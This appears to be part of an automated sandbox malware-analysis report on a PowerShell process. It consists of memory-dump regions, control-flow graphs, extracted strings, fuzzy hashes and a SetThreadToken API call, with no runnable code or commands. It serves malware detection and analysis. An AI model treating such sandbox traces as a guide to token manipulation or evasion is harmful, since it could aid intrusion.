                          • Instruction ID: 19bfe93a1b2f94faf52a50cd429b1c6d93b2241093ecf2598d78fac6d2a4896e
                          • Opcode Fuzzy Hash: 604c3009d27c983359ad485edd813eaebfa19dbf5c6e3f5ffacb616c5654bc8a
                          • Instruction Fuzzy Hash: CF2247B1B002059FCB64AB69C851BBABBE6FFC5311F04807AD925CB291DB35C945C7B2

                          Control-flow Graph

                          control_flow_graph 206 7a83ce8-7a83d0d 208 7a83f00-7a83f1e 206->208 209 7a83d13-7a83d18 206->209 217 7a83f28-7a83f2b 208->217 218 7a83f20-7a83f22 208->218 210 7a83d1a-7a83d20 209->210 211 7a83d30-7a83d34 209->211 213 7a83d22 210->213 214 7a83d24-7a83d2e 210->214 215 7a83d3a-7a83d3c 211->215 216 7a83eb0-7a83eba 211->216 213->211 214->211 221 7a83d4c 215->221 222 7a83d3e-7a83d4a 215->222 219 7a83ec8-7a83ece 216->219 220 7a83ebc-7a83ec5 216->220 223 7a83f2c-7a83f4a 217->223 218->223 224 7a83f24-7a83f26 218->224 225 7a83ed0-7a83ed2 219->225 226 7a83ed4-7a83ee0 219->226 228 7a83d4e-7a83d50 221->228 222->228 229 7a840ce-7a840e6 223->229 230 7a83f50-7a83f55 223->230 224->217 231 7a83ee2-7a83efd 225->231 226->231 228->216 232 7a83d56-7a83d75 228->232 243 7a840e8-7a840ec 229->243 244 7a840f0-7a84112 229->244 233 7a83f6d-7a83f71 230->233 234 7a83f57-7a83f5d 230->234 260 7a83d85 232->260 261 7a83d77-7a83d83 232->261 240 7a84080-7a8408a 233->240 241 7a83f77-7a83f79 233->241 236 7a83f5f 234->236 237 7a83f61-7a83f6b 234->237 236->233 237->233 245 7a8408c-7a84094 240->245 246 7a84097-7a8409d 240->246 247 7a83f89 241->247 248 7a83f7b-7a83f87 241->248 243->244 254 7a84228-7a8424a 244->254 255 7a84118-7a8411d 244->255 251 7a8409f-7a840a1 246->251 252 7a840a3-7a840af 246->252 249 7a83f8b-7a83f8d 247->249 248->249 249->240 259 7a83f93-7a83fb2 249->259 262 7a840b1-7a840cb 251->262 252->262 275 7a8424c-7a84253 254->275 276 7a84254-7a8425d 254->276 257 7a8411f-7a84125 255->257 258 7a84135-7a84139 255->258 263 7a84129-7a84133 257->263 264 7a84127 257->264 267 7a841da-7a841e4 258->267 268 7a8413f-7a84141 258->268 296 7a83fc2 259->296 297 7a83fb4-7a83fc0 259->297 265 7a83d87-7a83d89 260->265 261->265 263->258 264->258 265->216 271 7a83d8f-7a83d96 265->271 277 7a841f1-7a841f7 267->277 278 7a841e6-7a841ee 267->278 272 7a84151 268->272 273 7a84143-7a8414f 268->273 271->208 280 7a83d9c-7a83da1 271->280 281 7a84153-7a84155 272->281 273->281 275->276 282 7a8428b-7a84295 276->282 283 7a8425f-7a84281 276->283 284 7a841f9-7a841fb 277->284 285 7a841fd-7a84209 277->285 289 7a83db9-7a83dc8 280->289 290 7a83da3-7a83da9 280->290 281->267 292 7a8415b-7a8415d 281->292 286 7a8429f-7a842a5 282->286 287 7a84297-7a8429c 282->287 322 7a84283-7a84288 283->322 323 7a842d5-7a842fe 283->323 293 7a8420b-7a84225 284->293 285->293 294 7a842ab-7a842b7 286->294 295 7a842a7-7a842a9 286->295 289->216 319 7a83dce-7a83dec 289->319 298 7a83dab 290->298 299 7a83dad-7a83db7 290->299 300 7a8415f-7a84165 292->300 301 7a84177-7a8417e 292->301 307 7a842b9 294->307 295->307 308 7a83fc4-7a83fc6 296->308 297->308 298->289 299->289 309 7a84169-7a84175 300->309 310 7a84167 300->310 305 7a84180-7a84186 301->305 306 7a84196-7a841d7 301->306 312 7a84188 305->312 313 7a8418a-7a84194 305->313 321 7a842be-7a842d2 307->321 308->240 316 7a83fcc-7a84003 308->316 309->301 310->301 312->306 313->306 337 7a8401d-7a84024 316->337 338 7a84005-7a8400b 316->338 319->216 332 7a83df2-7a83e17 319->332 335 7a8432d-7a84335 323->335 336 7a84300-7a84326 323->336 332->216 353 7a83e1d-7a83e24 332->353 335->321 349 7a84337-7a8435c 335->349 336->335 343 7a8403c-7a8407d 337->343 344 7a84026-7a8402c 337->344 340 7a8400d 338->340 341 7a8400f-7a8401b 338->341 340->337 341->337 346 7a8402e 344->346 347 7a84030-7a8403a 344->347 346->343 347->343 354 7a8435e-7a8437b 349->354 355 7a84395-7a8439f 349->355 358 7a83e6a-7a83e9d 353->358 359 7a83e26-7a83e41 353->359 367 7a8437d-7a8438f 354->367 368 7a843e5-7a843ea 354->368 356 7a843a8-7a843ae 355->356 357 7a843a1-7a843a5 355->357 361 7a843b0-7a843b2 356->361 362 7a843b4-7a843c0 356->362 379 7a83ea4-7a83ead 358->379 370 7a83e5b-7a83e5f 359->370 371 7a83e43-7a83e49 359->371 364 7a843c2-7a843e2 361->364 362->364 367->355 368->367 377 7a83e66-7a83e68 370->377 375 7a83e4b 371->375 376 7a83e4d-7a83e59 371->376 375->370 376->370 377->379
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$4'jq$4'jq
                          • API String ID: 0-4000621977
                          • Opcode ID: cd5bdf4d7dd17c5015605db039194cd8c9af4d5037a1c58d375d622cb52552aa
                          • Instruction ID: b5de01c97c79f195284e50d89c2f599ac24136dcf98deac6f11e2d44b1436964
                          • Opcode Fuzzy Hash: cd5bdf4d7dd17c5015605db039194cd8c9af4d5037a1c58d375d622cb52552aa
                          • Instruction Fuzzy Hash: 5A1277B1704352CFCB51AB28C811B6BBBB2AFD5710F14846AD921CF291DB36DD46C7A2

                          Control-flow Graph

                          control_flow_graph 385 7a817b8-7a817da 386 7a81969-7a81971 385->386 387 7a817e0-7a817e5 385->387 395 7a818fa-7a81905 386->395 396 7a81973-7a819b5 386->396 388 7a817fd-7a81801 387->388 389 7a817e7-7a817ed 387->389 393 7a81914-7a8191e 388->393 394 7a81807-7a8180b 388->394 390 7a817ef 389->390 391 7a817f1-7a817fb 389->391 390->388 391->388 397 7a8192c-7a81932 393->397 398 7a81920-7a81929 393->398 399 7a8184b 394->399 400 7a8180d-7a8181e 394->400 424 7a8190a-7a81911 395->424 403 7a819bb-7a819c0 396->403 404 7a81b04-7a81b25 396->404 405 7a81938-7a81944 397->405 406 7a81934-7a81936 397->406 401 7a8184d-7a8184f 399->401 400->386 416 7a81824-7a81829 400->416 401->393 408 7a81855-7a81859 401->408 409 7a819d8-7a819dc 403->409 410 7a819c2-7a819c8 403->410 431 7a81aac-7a81ab1 404->431 432 7a81b27-7a81b34 404->432 412 7a81946-7a81966 405->412 406->412 408->393 413 7a8185f-7a81863 408->413 418 7a819e2-7a819e4 409->418 419 7a81ab4-7a81abe 409->419 414 7a819ca 410->414 415 7a819cc-7a819d6 410->415 425 7a81865-7a8186e 413->425 426 7a81886 413->426 414->409 415->409 427 7a8182b-7a81831 416->427 428 7a81841-7a81849 416->428 429 7a819f4 418->429 430 7a819e6-7a819f2 418->430 422 7a81acc-7a81ad2 419->422 423 7a81ac0-7a81ac9 419->423 440 7a81ad8-7a81ae4 422->440 441 7a81ad4-7a81ad6 422->441 435 7a81870-7a81873 425->435 436 7a81875-7a81882 425->436 438 7a81889-7a818ab 426->438 442 7a81833 427->442 443 7a81835-7a8183f 427->443 428->401 439 7a819f6-7a819f8 429->439 430->439 433 7a81b44 432->433 434 7a81b36-7a81b42 432->434 444 7a81b46-7a81b48 433->444 434->444 448 7a81884 435->448 436->448 438->424 439->419 446 7a819fe-7a81a16 439->446 447 7a81ae6-7a81b01 440->447 441->447 442->428 443->428 450 7a81b4a-7a81b50 444->450 451 7a81b7c-7a81b86 444->451 464 7a81a18-7a81a1e 446->464 465 7a81a30-7a81a34 446->465 448->438 455 7a81b5e-7a81b79 450->455 456 7a81b52-7a81b54 450->456 459 7a81b88-7a81b8d 451->459 460 7a81b90-7a81b96 451->460 456->455 461 7a81b98-7a81b9a 460->461 462 7a81b9c-7a81ba8 460->462 470 7a81baa-7a81bc1 461->470 462->470 466 7a81a20 464->466 467 7a81a22-7a81a2e 464->467 472 7a81a3a-7a81a41 465->472 466->465 467->465 475 7a81a48-7a81aa5 472->475 476 7a81a43-7a81a46 472->476 477 7a81aaa 475->477 476->477 477->431
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2181787883.0000000007A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_7a80000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: El$El
                          • API String ID: 0-3664010398
                          • Opcode ID: abfe71a9677a5b77868a8de68a87c2dd1b2b89d4c84bb973da0a7cfd8542c382
                          • Instruction ID: 3f8f1b386461c28546a29e5f06b5fef9504c96cf02672e9c13ebb6d5484d7dc4
                          • Opcode Fuzzy Hash: abfe71a9677a5b77868a8de68a87c2dd1b2b89d4c84bb973da0a7cfd8542c382
                          • Instruction Fuzzy Hash: B5B126B2B0420A9FCB54EB68D800AAAFBE6EFC5211F14C07ED465CB251DB31DD46C7A1

                          Control-flow Graph

                          control_flow_graph 550 8bf7c5a-8bf7c9b 551 8bf7ca3-8bf7ccf SetThreadToken 550->551 552 8bf7cd8-8bf7cf5 551->552 553 8bf7cd1-8bf7cd7 551->553 553->552
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: 56f1e4c9bd03e4ef8178d7673d73f8297660deecc3fa2cdd53c446fcf85217c8
                          • Instruction ID: f5b54cba4b5a46fe9dd57cf465606717d23318e9270376ea555d5a052a426f0f
                          • Opcode Fuzzy Hash: 56f1e4c9bd03e4ef8178d7673d73f8297660deecc3fa2cdd53c446fcf85217c8
                          • Instruction Fuzzy Hash: 1A1116B59002888FCB10DF9AC588B9EFFF4AF49320F148499D559A7350C774A948CFA5

                          Control-flow Graph

                          control_flow_graph 556 8bf7c60-8bf7ccf SetThreadToken 558 8bf7cd8-8bf7cf5 556->558 559 8bf7cd1-8bf7cd7 556->559 559->558
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.2190328303.0000000008BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_8bf0000_powershell.jbxd
                          Similarity
                          • API ID: ThreadToken
                          • String ID:
                          • API String ID: 3254676861-0
                          • Opcode ID: c48d59d81632236455c5295f8a09afab59f9c2a452f0e481455b40e82717492d
                          • Instruction ID: 6a81839aa18c82da6d31ebc1248f215d44187b0b2bff2c710426319b1e5a9206
                          • Opcode Fuzzy Hash: c48d59d81632236455c5295f8a09afab59f9c2a452f0e481455b40e82717492d
                          • Instruction Fuzzy Hash: D911F5B59002488FCB10DF9AC988B9EFBF8EB48324F148459D519A7350C778A944CFA5

                          Control-flow Graph

                          control_flow_graph 562 4bf70a8-4bf70c7 563 4bf71cd-4bf720b 562->563 564 4bf70cd-4bf70d0 562->564 592 4bf70d2 call 4bf775f 564->592 593 4bf70d2 call 4bf7744 564->593 565 4bf70d8-4bf70ea 567 4bf70ec 565->567 568 4bf70f6-4bf710b 565->568 567->568 574 4bf7196-4bf71af 568->574 575 4bf7111-4bf7121 568->575 580 4bf71ba 574->580 581 4bf71b1 574->581 576 4bf712d-4bf7138 575->576 577 4bf7123 575->577 590 4bf713b call 4bfc000 576->590 591 4bf713b call 4bfbff0 576->591 577->576 580->563 581->580 583 4bf7141-4bf7145 584 4bf7147-4bf7157 583->584 585 4bf7185-4bf7190 583->585 586 4bf7159-4bf7171 584->586 587 4bf7173-4bf717d 584->587 585->574 585->575 586->585 587->585 590->583 591->583 592->565 593->565
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (nq
                          • API String ID: 0-2756854522
                          • Opcode ID: 5ab3f0c18bdfd717d7ccfd423cbeced329f566b0712d3e805f3b126b877fa39f
                          • Instruction ID: 7d89c82bfaa2447d344bfd2b3b6e80cb9b0bfcc5d3378660edd52ca52ce6b8c3
                          • Opcode Fuzzy Hash: 5ab3f0c18bdfd717d7ccfd423cbeced329f566b0712d3e805f3b126b877fa39f
                          • Instruction Fuzzy Hash: 71412B34B042048FDB18DF69C858AA9BBF2EF8D311F1444D9D946AB391DE31ED06CB61

                          Control-flow Graph

                          control_flow_graph 594 4bfae08-4bfae99 601 4bfaea3-4bfaeae 594->601 613 4bfaeb1 call 4bfaf50 601->613 614 4bfaeb1 call 4bfaf40 601->614 602 4bfaeb7-4bfaf3c call 4bf911c 613->602 614->602
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: [m^
                          • API String ID: 0-1166968519
                          • Opcode ID: e15d62b3166fadcbce5c8ceb0f33d8ee9def3cafa4263035acdfb2538802635d
                          • Instruction ID: 578e5dcdf5d416d858632a00d1db45fe8c9ab2eb2fdbbf57fe935b8a06a33b0b
                          • Opcode Fuzzy Hash: e15d62b3166fadcbce5c8ceb0f33d8ee9def3cafa4263035acdfb2538802635d
                          • Instruction Fuzzy Hash: 9E3160B8A003059FD704EF64D954AAE7BB6EF88300F1184A9D215AB3A5CA38AD458F50

                          Control-flow Graph

                          control_flow_graph 615 4bfb078-4bfb081 call 4bfaa64 617 4bfb086-4bfb08a 615->617 618 4bfb08c-4bfb099 617->618 619 4bfb09a-4bfb135 617->619 625 4bfb13e-4bfb15b 619->625 626 4bfb137-4bfb13d 619->626 626->625
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (&jq
                          • API String ID: 0-3222446104
                          • Opcode ID: bee1d1f60fa34f7fff21a9b778cbc3d48eba911d0e26f4f98b616fad9d52df07
                          • Instruction ID: b1890e7abbd8bcff5506d8d9d82a4142d58bf2a8cf772e0cfce855fdd3013265
                          • Opcode Fuzzy Hash: bee1d1f60fa34f7fff21a9b778cbc3d48eba911d0e26f4f98b616fad9d52df07
                          • Instruction Fuzzy Hash: 8121AE71A043588FCB14DFAED844BAFBFF5EB89720F14846AD518A7340CA74A9058BA5

                          Control-flow Graph

                          control_flow_graph 629 4bfae18-4bfaeae 648 4bfaeb1 call 4bfaf50 629->648 649 4bfaeb1 call 4bfaf40 629->649 637 4bfaeb7-4bfaf3c call 4bf911c 648->637 649->637
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: [m^
                          • API String ID: 0-1166968519
                          • Opcode ID: 97b569f359cc86eddc271a73774adb73c795dd930d777c122601078ea7b7b742
                          • Instruction ID: 33b160449a41290bc621bd01de63e79d083db2a4624054e232fc6966826f6f4f
                          • Opcode Fuzzy Hash: 97b569f359cc86eddc271a73774adb73c795dd930d777c122601078ea7b7b742
                          • Instruction Fuzzy Hash: C8312178A00205AFDB04EFA4D954AEE77B6EF88300F108469D615AB394DB35ED558F50

                          Control-flow Graph

                          control_flow_graph 650 4bfdd68-4bfdd74 651 4bfdded-4bfdf16 650->651 652 4bfdd76-4bfdd8d 650->652 655 4bfdd8f 652->655 656 4bfdd96-4bfdda8 652->656 655->656 660 4bfddaa call 4bfddb9 656->660 661 4bfddaa call 4bfddc8 656->661 662 4bfddaa call 4bfdd68 656->662 659 4bfddb0-4bfddb3 660->659 661->659 662->659
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: K.m^
                          • API String ID: 0-4201954797
                          • Opcode ID: ab3059ec344e0721a1c8b77307cd10157a8e75028f2e4dbb6114c2887e390556
                          • Instruction ID: 08c6a192e6bba24a505f92bfa5a685fb70853f22e9e625813d38c56b86ac0ed3
                          • Opcode Fuzzy Hash: ab3059ec344e0721a1c8b77307cd10157a8e75028f2e4dbb6114c2887e390556
                          • Instruction Fuzzy Hash: DEF0E9357057106BC7169619AD14AEA7B6DDFC62B1B01489BD24ECB191DE20A80D87A1

                          Control-flow Graph

                          control_flow_graph 663 4bfdd78-4bfdd8d 665 4bfdd8f 663->665 666 4bfdd96 663->666 665->666 667 4bfdd9e-4bfdda8 666->667 669 4bfddaa call 4bfddb9 667->669 670 4bfddaa call 4bfddc8 667->670 671 4bfddaa call 4bfdd68 667->671 668 4bfddb0-4bfddb3 669->668 670->668 671->668
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: K.m^
                          • API String ID: 0-4201954797
                          • Opcode ID: e55c730da23ce86238b9596a5f3a349c46d259de6796540292b546303698eb33
                          • Instruction ID: 984e10ebfa8d952f7575eaba27c0264aaa7dad3ee47ca2e71486281eff1cd2a7
                          • Opcode Fuzzy Hash: e55c730da23ce86238b9596a5f3a349c46d259de6796540292b546303698eb33
                          • Instruction Fuzzy Hash: E7E0C236300B14178315AA1EA80099FB7EEDFC96B1300442EE15ECB340DF64FC0A87D6

                          Control-flow Graph

                          control_flow_graph 835 4bf29f0-4bf2a1e 836 4bf2af5-4bf2b37 835->836 837 4bf2a24-4bf2a3a 835->837 841 4bf2b3d-4bf2b56 836->841 842 4bf2c51-4bf2c61 836->842 838 4bf2a3f-4bf2a52 837->838 839 4bf2a3c 837->839 838->836 846 4bf2a58-4bf2a65 838->846 839->838 844 4bf2b5b-4bf2b69 841->844 845 4bf2b58 841->845 844->842 852 4bf2b6f-4bf2b79 844->852 845->844 848 4bf2a6a-4bf2a7c 846->848 849 4bf2a67 846->849 848->836 853 4bf2a7e-4bf2a88 848->853 849->848 854 4bf2b7b-4bf2b7d 852->854 855 4bf2b87-4bf2b94 852->855 856 4bf2a8a-4bf2a8c 853->856 857 4bf2a96-4bf2aa6 853->857 854->855 855->842 858 4bf2b9a-4bf2baa 855->858 856->857 857->836 859 4bf2aa8-4bf2ab2 857->859 860 4bf2baf-4bf2bbd 858->860 861 4bf2bac 858->861 862 4bf2ab4-4bf2ab6 859->862 863 4bf2ac0-4bf2af4 859->863 860->842 865 4bf2bc3-4bf2bd3 860->865 861->860 862->863 867 4bf2bd8-4bf2be5 865->867 868 4bf2bd5 865->868 867->842 871 4bf2be7-4bf2bf7 867->871 868->867 872 4bf2bfc-4bf2c08 871->872 873 4bf2bf9 871->873 872->842 875 4bf2c0a-4bf2c24 872->875 873->872 876 4bf2c29 875->876 877 4bf2c26 875->877 878 4bf2c2e-4bf2c38 876->878 877->876 879 4bf2c3d-4bf2c50 878->879
                          Memory Dump Source
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c5da13d072dd52f131bd74e84ecd9481de8b69a5e7c9a049ebc15304b738d70c
                          • Instruction ID: ee066851113c92e869cf2a938a1dc9273ffbf07b2412aff0e1a43f4bb410272b
                          • Opcode Fuzzy Hash: c5da13d072dd52f131bd74e84ecd9481de8b69a5e7c9a049ebc15304b738d70c
                          • Instruction Fuzzy Hash: 6DF0E2353083446BC7062B3498283AD3F65EB86729F06409BD6598B2C3DF654C1A83A5
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4906641bfc4f92081fb90940f339d68479fc46dec34ec2f0f29ec66873c4e9cc
                          • Instruction ID: adcd5ef8b4758b396e4a7a49d03fbbcd2a2dc1497e2faee7d89c9ac90672f135
                          • Opcode Fuzzy Hash: 4906641bfc4f92081fb90940f339d68479fc46dec34ec2f0f29ec66873c4e9cc
                          • Instruction Fuzzy Hash: DFE0E5357001148F83109F5DD898C26B7FAEFCEB2572910AAF64ACB735DA61EC01DB90
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 77d7d86c79e02c6bc7776b135b942d3c71d51b0ef535907f350e9df189f44291
                          • Instruction ID: 6605c215acb11f4fbef9e419f0e2e13acb5fda7b2ebcec80a29a6abfc00df166
                          • Opcode Fuzzy Hash: 77d7d86c79e02c6bc7776b135b942d3c71d51b0ef535907f350e9df189f44291
                          • Instruction Fuzzy Hash: 09E0DF327083900BCB0AC138AD656616B278BC7B20B09C4FBE688DF2D6DC11980E8350
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c5135b89f95f3cf13437f4e9adb57c949a773ee20eae143d8ddd7a3ef11eadc
                          • Instruction ID: f72f3ba4332c33ffd11e0293154f5e6647504cfadc2431ea2bdb94307cb799da
                          • Opcode Fuzzy Hash: 8c5135b89f95f3cf13437f4e9adb57c949a773ee20eae143d8ddd7a3ef11eadc
                          • Instruction Fuzzy Hash: E5F0ED749003049BD764DFB9D49879A7BE9EB44350F00486EE65ED7380DB3568948B90
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cd059b8491cd892a351dd662a6866e6b5d7bc0da22de81dfededa31106180a4
                          • Instruction ID: a4911aa1b65a0e3a7f404fe3d87adece468c33d95fb9ec574971f9dd9fc8a618
                          • Opcode Fuzzy Hash: 8cd059b8491cd892a351dd662a6866e6b5d7bc0da22de81dfededa31106180a4
                          • Instruction Fuzzy Hash: A4E02635304210A7CB083B78A42C2EE7A5AEBC4724F01002FE72A83382EF38592583D9
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae36fd051dbb61270755223b50bb5ead628434ced74675b6cd75684d83b5e13a
                          • Instruction ID: 1076e0e6c7b41909896f1988121e3481e1bcbd5b2b593777bcf6e993a308470f
                          • Opcode Fuzzy Hash: ae36fd051dbb61270755223b50bb5ead628434ced74675b6cd75684d83b5e13a
                          • Instruction Fuzzy Hash: 7AD05E563001292B176438AA9C107BBA1CFCEC68A9B0611BB9B0CDB241EE40EC0913F2
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction ID: 87adb7e8b650d68a6127c4da90837fd51d9572eca892b638fd62745aa1f16925
                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction Fuzzy Hash: 1DE08631B00014978B089559D8144D9F7AADBCC220F04847ADA4EA7340DE32691987E1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1f45a47eadb6d9f74c481298bba2829e1a714a05d7bc4deff0f8327183006c72
                          • Instruction ID: 84204a42f5a17c5460f640c295d4f79079bb019aa2696fd67975493fcaedc4f8
                          • Opcode Fuzzy Hash: 1f45a47eadb6d9f74c481298bba2829e1a714a05d7bc4deff0f8327183006c72
                          • Instruction Fuzzy Hash: 54D02B6A7001151F571879B98E107BA51CFCEC145D70214BB870CEB250DE10DC0D03F1
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 917853470c88980b89a5e81f510c0a2c7b9c10b5d46d8e7e27f0050d93dea249
                          • Instruction ID: a942d106534a9afa23711e284d21d662c864d75ae1e5dc1ba8eb662f27b3da5e
                          • Opcode Fuzzy Hash: 917853470c88980b89a5e81f510c0a2c7b9c10b5d46d8e7e27f0050d93dea249
                          • Instruction Fuzzy Hash: F2E0D830A043499BC704DFA4D456A59BFB4EB45204F008058DE98973C1E6315855CB81
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 882424587e394cdb101b4377de33b52bbd313419467bb2836bbc6dcd2697ed0e
                          • Instruction ID: 50a3cab16c5a42404c520f8e0cb5fe7306dbb90d3f3483ef3bd18fe34423d562
                          • Opcode Fuzzy Hash: 882424587e394cdb101b4377de33b52bbd313419467bb2836bbc6dcd2697ed0e
                          • Instruction Fuzzy Hash: 88E0DF304142469BCF09DFB0E85FABD7F34FB11306F0141AED5A24A2D1EA31164ACB40
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a387e8dbc1d9d637ffbb0ccc64ee3443ba76aff1ba137ac59e1ed5ac50c34d67
                          • Instruction ID: 5f0a927ae0276c5d68ff2ff844e665c1bb5c4e2b71aba49ff2fd6718fe56dbd8
                          • Opcode Fuzzy Hash: a387e8dbc1d9d637ffbb0ccc64ee3443ba76aff1ba137ac59e1ed5ac50c34d67
                          • Instruction Fuzzy Hash: 9CE01A70D0424A9FCB80DFBCC845669FFF0EB4A210B6486EEC959E7205E7329651CF81
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction ID: 867c128586e4b1c81a5b87f459796369520d48b6b9d6f9c0c9d64b326a471de4
                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction Fuzzy Hash: F2D042B0D042099F8780EFA9894156EFBF4AB48200F6085AA8919E7201E632AA128BD5
                          Memory Dump Source
                          • Source File: 00000001.00000002.2142533978.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_4bf0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
